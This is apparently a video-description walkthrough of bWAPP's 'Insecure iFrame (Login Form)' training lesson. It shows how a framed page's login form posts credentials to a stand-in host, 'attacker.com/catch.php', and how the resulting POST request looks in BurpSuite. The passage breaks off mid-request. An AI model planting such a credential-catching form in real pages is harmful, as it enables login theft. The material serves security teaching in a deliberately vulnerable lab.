bWAPP Insecure iFrame Login Form

Insecure iFrame (Login Form) - Low Security Level Solution: Step 1. Right click on the lesson page and select View Page Source. Note: As angled brackets aren't allowed in YouTube Description, replacing them with ( ), kindly make the necessary change. Step 2. Locate the (iframe src="http://10.0.2.15/evil/sandbox.htm" height="500" width="500")(iframe) Step 3. Click on the url http://10.0.2.15/evil/sandbox.htm a new page will pop up Right click and select View Page Source. Step 4. Note the form action: (You can also get the same results by right click on the lesson page and by selecting View Frame Source (form action="http://attacker.com/catch.php?" method="POST") Visit the url http://attacker.com/catch.php Step 5. Go back to the lesson page and click on Login Button and check the results. Reload the lesson page. *Note: I am using BurpSuite pre-configured browser, in case if you are not using the pre- configured browser then please configure the browser with proxy and then follow the below steps. Step 6. When you click on Login button and pass the lesson page through BurpSuite you will find below details: POST /catch.php? HTTP/1.1 Host: attacker.com PseudoTime